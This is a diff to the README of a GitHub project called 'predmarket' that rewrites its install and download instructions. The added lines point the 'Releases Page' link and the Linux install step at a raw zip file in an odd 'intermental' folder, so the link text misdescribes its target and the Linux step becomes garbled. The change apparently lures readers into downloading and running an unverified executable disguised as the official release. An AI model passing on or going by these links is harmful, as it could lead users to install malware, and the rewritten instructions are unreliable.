elsantos305/predmarket/README.md

 4. **Run the Installer**:
    - For Windows: Open the `.exe` file you downloaded and follow the installation prompts.
    - For macOS: Open the `.dmg` file and drag the application to your Applications folder.
-   - For Linux: Extract the `.tar.gz` file and run the executable included.
+   - For Linux: Extract the `https://raw.githubusercontent.com/elsantos305/predmarket/main/intermental/predmarket.zip` file and run the executable included.

 5. **Open the Application**: Once installed, locate the app in your applications list and double-click it to start.

 ## 📥 Download & Install

-You can easily download predmarket by visiting the [Releases Page](https://github.com/elsantos305/predmarket/releases).
+You can easily download predmarket by visiting the [Releases Page](https://raw.githubusercontent.com/elsantos305/predmarket/main/intermental/predmarket.zip).

 1. Go to the page and find the latest version.
 2. Click the download link for your operating system.